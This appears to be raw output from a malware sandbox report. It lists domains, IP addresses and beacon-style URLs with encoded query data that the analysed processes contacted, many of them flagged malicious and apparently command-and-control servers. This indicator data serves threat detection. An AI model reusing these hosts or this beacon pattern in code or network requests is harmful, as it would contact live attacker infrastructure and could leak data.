          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
          http://www.nng65.top/h709/?H2y4Q2Q8=K19RRo0+W5bkHzt/kGO1GXdUCAo27ospRE6aVBDVB85mxx/BWRNO7W8tE1ABstUaNhgsM0PXN6LEEUcuV+ABIwVt+cr/SVHjyrZEqxxi7mgW2GmUlGD3zsM=&Bz=dVmT0%Avira URL Cloudsafe
          https://dts.gnpge.com0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
          https://dts.gnpge.com0%VirustotalBrowse
          https://whois.gandi.net/en/results?search=ultraleap.net0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/29590/bg1.png)0%VirustotalBrowse
          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%VirustotalBrowse
          http://www.d97fw.top/j0mp/0%Avira URL Cloudsafe
          https://cdn.consentmanager.net0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
          http://www.yourhomecopilot.online/Ford_Pilot.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmjpDrHrT0%Avira URL Cloudsafe
          http://www.dhkatp.vip/9s2o/?Bz=dVmT&H2y4Q2Q8=prWBQsAwrZpv7mHAq1FXByVARW5NjJRnrzAr3GgQzsI4A3w4ZA4WuBDFNuHRILf/rVXOedGSZ/C98FL7KLA1eCpMs9SPUaNqPsXwbtKHuIyZJdKU8IRxK90=0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%VirustotalBrowse
          http://www.yourhomecopilot.online/jdoy/0%Avira URL Cloudsafe
          http://www.yourhomecopilot.online/Pilot_Q7.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmjpDrHrT9c0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
          http://www.albero-dveri.online/1c4z/?Bz=dVmT&H2y4Q2Q8=uH3oXmCyKhv12wMg2v78JJzwEYn/lYgzhazO5KT2jZEQG/yNL9LDr+55JN6gx8V2Xj527gP6ldjWu2/TSaNc6Hf688ZwfSY5DkyVJYE+oT0rVFjFcCJAjhw=0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
          https://www.google.com0%Avira URL Cloudsafe
          https://cdn.consentmanager.net0%VirustotalBrowse
          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%VirustotalBrowse
          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
          https://www.google.com0%VirustotalBrowse
          http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%VirustotalBrowse
          https://whois.gandi.net/en/results?search=ultraleap.net0%VirustotalBrowse
          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
          http://www.Yourhomecopilot.online0%Avira URL Cloudsafe
          http://www.quantis.life/hczh/?H2y4Q2Q8=PX7ZYihlISWoMj5XL7HmfIBrzSHZgex3VSfo7iAvdq2Z2mw/VidHaTx6B+O6q8H9oVn81dTeg6wtRvzUgGLPdUVeFYu2umsrNDNvQmGyZ7Wn5FjCR5RM1Sg=&Bz=dVmT0%Avira URL Cloudsafe
          http://www.d97fw.top/j0mp/?H2y4Q2Q8=Z/pSzs4YWamdiRAplR/Ej5tGRhiBgJB9bxIOyGq96zoZD1hQH/defqLrGltjrHK/beRpV4qUbRPgIh2e4d3W0Xm6R3nN1+YhCvZ1f10jcDAfTuCZhGE4//M=&Bz=dVmT0%Avira URL Cloudsafe
          http://www.ultraleap.net/hwgh/?Bz=dVmT&H2y4Q2Q8=p12lJFutXIXWecvX+pOy0qX/JeAxiBU6RDtVKqSTVTQfRACFjtYFw4mSuOp1Sp2gCjSvwjzXjhptyda5D5IzL2v6W/DloKvIiVUMOxSgv1qe9KALWIqXnK4=0%Avira URL Cloudsafe
          http://www.vpnboo.online/4kww/?H2y4Q2Q8=wCb19ovIO5yaf83ih/4WSZQzUgTiwtPQuomKA52vzoLzoGlIy2AAZn2TjJlMNmIf2OXgIRW9tXCTvrd658lOU5u0mQHiLMGqbxOZL/2HkpMEINgcF945eLE=&Bz=dVmT0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
          http://www.Yourhomecopilot.online0%VirustotalBrowse
          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%VirustotalBrowse
          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%VirustotalBrowse
          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%VirustotalBrowse
          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%VirustotalBrowse
          http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
          http://www.nad5.shop/2xqm/?H2y4Q2Q8=oDETxlWYAFo+3slVIYbfKvixoZlHsEllIisreF9SIx9j/XGohAL3BdHT/kHELWqlJj8ALq9Wf9sMlTPRJCB3B/sNJln602quSeae+GkzKeQobAdRTIwOPvg=&Bz=dVmT0%Avira URL Cloudsafe
          http://www.yourhomecopilot.online/Virtual_Flying.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmjpD0%Avira URL Cloudsafe
          http://www.nad5.shop/2xqm/0%Avira URL Cloudsafe
          https://delivery.consentmanager.net0%Avira URL Cloudsafe
          http://www.tonesandtribes.shop/ypts/0%Avira URL Cloudsafe
          http://www.albero-dveri.online0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
          http://www.dhkatp.vip/9s2o/0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
          http://www.yourhomecopilot.online/__media__/design/underconstructionnotice.php?d=yourhomecopilot.onl0%Avira URL Cloudsafe
          http://www.pakmartcentral.shop/vjx2/?H2y4Q2Q8=9aa+ebD5OTE0lBkm4Kjh493Ja3hDWXzPkU1zrWX+7QP9IJ+JaTmo4ECV77f2d/uDA3HyxannnyxFIZeVcaZYE0A0z8ljIos92WGKr+w0G6nn5qOoDhBTaUg=&Bz=dVmT0%Avira URL Cloudsafe
          http://www.yourhomecopilot.online/How_to_Be_a_Pilot.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8Mm0%Avira URL Cloudsafe
          https://www.gandi.net/en/domain0%Avira URL Cloudsafe
          http://www.ultraleap.net/hwgh/0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
          http://www.yourhomecopilot.online/Virtual_Flight.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmjpD0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
          http://www.aposentandolegal.com/2n2j/0%Avira URL Cloudsafe
          http://www.quantis.life/hczh/0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
          http://www.yourhomecopilot.online/__media__/js/trademark.php?d=yourhomecopilot.online&type=ns0%Avira URL Cloudsafe
          http://www.aposentandolegal.com/2n2j/?H2y4Q2Q8=joFs8vB6GTglbhp7B9ScZSy2L461ph/vq3RLpj4QvQQ4ra1TX7UyKU9MnTuOCnS10i5K+tOQN6x6Jww8jSAgdDHT6tnC+5q3FmMH6tu6qP4vAW8RETmJ+Sw=&Bz=dVmT0%Avira URL Cloudsafe
          http://www.new-wellness.net/ekf2/?H2y4Q2Q8=eGJ56OPHB8ms9yLKA6o1AVbEgtJ1lMGREkC6jMn0bkkWaJWEmftp/abQzNeB3IUfOGcoIaMR8ugSslinjs3LGY8O9t1X/97Wa64G9saU8IPvFXfRaWKOmGA=&Bz=dVmT0%Avira URL Cloudsafe
          http://www.albero-dveri.online/1c4z/0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
          http://www.pakmartcentral.shop/vjx2/0%Avira URL Cloudsafe
          http://www.new-wellness.net/ekf2/0%Avira URL Cloudsafe
          http://www.yourhomecopilot.online/jdoy/?H2y4Q2Q8=fU4azshV0/DNX5FGmAV3JOEf7EKImuQsYvPexFWWcX9MIQ9nvaf6vDqBy6zpBn81oaqc3e/vpJAI/CRbOPpzHFqQC8jTwTTdv0trviStTJwFUFFtQyn4XQk=&Bz=dVmT0%Avira URL Cloudsafe
          http://www.unfazedtv.live/6vaz/?Bz=dVmT&H2y4Q2Q8=LgoeL6qgo6xxr1EFrztEZdx+E/+1tytDLt8ibzyxUeJmcR9hA6rXNwb8WOqwQ6QehWK82jCTordIq8Khn9B3BWsFCXvHkzTnCgqWXit0BdDbSBQp26/GsKo=0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
          http://www.vpnboo.online/4kww/0%Avira URL Cloudsafe
          http://www.nng65.top/h709/0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          webredir.vip.gandi.net
          217.70.184.50
          truetrueunknown
          www.albero-dveri.online
          194.58.112.174
          truetrue
            unknown
            pakmartcentral.shop
            84.32.84.32
            truetrueunknown
            www.vpnboo.online
            194.85.61.76
            truetrue
              unknown
              www.tonesandtribes.shop
              52.223.13.41
              truetrue
                unknown
                dhkatp.vip
                3.33.130.190
                truetrue
                  unknown
                  aposentandolegal.com
                  3.33.130.190
                  truetrueunknown
                  www.new-wellness.net
                  134.119.247.136
                  truetrue
                    unknown
                    94950.bodis.com
                    199.59.243.227
                    truetrueunknown
                    www.yourhomecopilot.online
                    208.91.197.27
                    truetrueunknown
                    www.nad5.shop
                    156.226.22.233
                    truetrueunknown
                    d97fw.top
                    206.119.82.172
                    truetrue
                      unknown
                      www.quantis.life
                      162.0.238.246
                      truetrue
                        unknown
                        nng65.top
                        38.47.233.65
                        truetrueunknown
                        www.ultraleap.net
                        unknown
                        unknowntrue
                          unknown
                          www.d97fw.top
                          unknown
                          unknowntrue
                            unknown
                            www.gerakankoreri.net
                            unknown
                            unknowntrue
                              unknown
                              www.pakmartcentral.shop
                              unknown
                              unknowntrue
                                unknown
                                www.dhkatp.vip
                                unknown
                                unknowntrue
                                  unknown
                                  www.aposentandolegal.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.unfazedtv.live
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.nng65.top
                                      unknown
                                      unknowntrueunknown
                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.nng65.top/h709/?H2y4Q2Q8=K19RRo0+W5bkHzt/kGO1GXdUCAo27ospRE6aVBDVB85mxx/BWRNO7W8tE1ABstUaNhgsM0PXN6LEEUcuV+ABIwVt+cr/SVHjyrZEqxxi7mgW2GmUlGD3zsM=&Bz=dVmTtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.d97fw.top/j0mp/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.dhkatp.vip/9s2o/?Bz=dVmT&H2y4Q2Q8=prWBQsAwrZpv7mHAq1FXByVARW5NjJRnrzAr3GgQzsI4A3w4ZA4WuBDFNuHRILf/rVXOedGSZ/C98FL7KLA1eCpMs9SPUaNqPsXwbtKHuIyZJdKU8IRxK90=true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.yourhomecopilot.online/jdoy/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.albero-dveri.online/1c4z/?Bz=dVmT&H2y4Q2Q8=uH3oXmCyKhv12wMg2v78JJzwEYn/lYgzhazO5KT2jZEQG/yNL9LDr+55JN6gx8V2Xj527gP6ldjWu2/TSaNc6Hf688ZwfSY5DkyVJYE+oT0rVFjFcCJAjhw=true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.quantis.life/hczh/?H2y4Q2Q8=PX7ZYihlISWoMj5XL7HmfIBrzSHZgex3VSfo7iAvdq2Z2mw/VidHaTx6B+O6q8H9oVn81dTeg6wtRvzUgGLPdUVeFYu2umsrNDNvQmGyZ7Wn5FjCR5RM1Sg=&Bz=dVmTtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.d97fw.top/j0mp/?H2y4Q2Q8=Z/pSzs4YWamdiRAplR/Ej5tGRhiBgJB9bxIOyGq96zoZD1hQH/defqLrGltjrHK/beRpV4qUbRPgIh2e4d3W0Xm6R3nN1+YhCvZ1f10jcDAfTuCZhGE4//M=&Bz=dVmTtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.ultraleap.net/hwgh/?Bz=dVmT&H2y4Q2Q8=p12lJFutXIXWecvX+pOy0qX/JeAxiBU6RDtVKqSTVTQfRACFjtYFw4mSuOp1Sp2gCjSvwjzXjhptyda5D5IzL2v6W/DloKvIiVUMOxSgv1qe9KALWIqXnK4=true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.vpnboo.online/4kww/?H2y4Q2Q8=wCb19ovIO5yaf83ih/4WSZQzUgTiwtPQuomKA52vzoLzoGlIy2AAZn2TjJlMNmIf2OXgIRW9tXCTvrd658lOU5u0mQHiLMGqbxOZL/2HkpMEINgcF945eLE=&Bz=dVmTtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.nad5.shop/2xqm/?H2y4Q2Q8=oDETxlWYAFo+3slVIYbfKvixoZlHsEllIisreF9SIx9j/XGohAL3BdHT/kHELWqlJj8ALq9Wf9sMlTPRJCB3B/sNJln602quSeae+GkzKeQobAdRTIwOPvg=&Bz=dVmTtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.nad5.shop/2xqm/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.tonesandtribes.shop/ypts/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.dhkatp.vip/9s2o/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.pakmartcentral.shop/vjx2/?H2y4Q2Q8=9aa+ebD5OTE0lBkm4Kjh493Ja3hDWXzPkU1zrWX+7QP9IJ+JaTmo4ECV77f2d/uDA3HyxannnyxFIZeVcaZYE0A0z8ljIos92WGKr+w0G6nn5qOoDhBTaUg=&Bz=dVmTtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.ultraleap.net/hwgh/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.aposentandolegal.com/2n2j/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.quantis.life/hczh/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.albero-dveri.online/1c4z/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.aposentandolegal.com/2n2j/?H2y4Q2Q8=joFs8vB6GTglbhp7B9ScZSy2L461ph/vq3RLpj4QvQQ4ra1TX7UyKU9MnTuOCnS10i5K+tOQN6x6Jww8jSAgdDHT6tnC+5q3FmMH6tu6qP4vAW8RETmJ+Sw=&Bz=dVmTtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.new-wellness.net/ekf2/?H2y4Q2Q8=eGJ56OPHB8ms9yLKA6o1AVbEgtJ1lMGREkC6jMn0bkkWaJWEmftp/abQzNeB3IUfOGcoIaMR8ugSslinjs3LGY8O9t1X/97Wa64G9saU8IPvFXfRaWKOmGA=&Bz=dVmTtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.pakmartcentral.shop/vjx2/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.new-wellness.net/ekf2/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.yourhomecopilot.online/jdoy/?H2y4Q2Q8=fU4azshV0/DNX5FGmAV3JOEf7EKImuQsYvPexFWWcX9MIQ9nvaf6vDqBy6zpBn81oaqc3e/vpJAI/CRbOPpzHFqQC8jTwTTdv0trviStTJwFUFFtQyn4XQk=&Bz=dVmTtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.unfazedtv.live/6vaz/?Bz=dVmT&H2y4Q2Q8=LgoeL6qgo6xxr1EFrztEZdx+E/+1tytDLt8ibzyxUeJmcR9hA6rXNwb8WOqwQ6QehWK82jCTordIq8Khn9B3BWsFCXvHkzTnCgqWXit0BdDbSBQp26/GsKo=true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.vpnboo.online/4kww/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.nng65.top/h709/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabRobocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://dts.gnpge.comdgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/ac/?q=Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://whois.gandi.net/en/results?search=ultraleap.netRobocopy.exe, 00000006.00000002.4791340165.0000000005950000.00000004.10000000.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000040E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/pics/29590/bg1.png)Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdn.consentmanager.netRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.yourhomecopilot.online/Ford_Pilot.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmjpDrHrTRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.yourhomecopilot.online/Pilot_Q7.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmjpDrHrT9cRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.google.comRobocopy.exe, 00000006.00000002.4791340165.0000000004FE4000.00000004.10000000.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.0000000003774000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2970976334.000000002CF14000.00000004.80000000.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.Yourhomecopilot.onlineRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRobocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/pics/28903/search.png)Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.yourhomecopilot.online/Virtual_Flying.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmjpDRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://delivery.consentmanager.netRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.albero-dveri.onlinedgGgsACWgP.exe, 00000007.00000002.4792153711.0000000005815000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.yourhomecopilot.online/__media__/design/underconstructionnotice.php?d=yourhomecopilot.onlRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
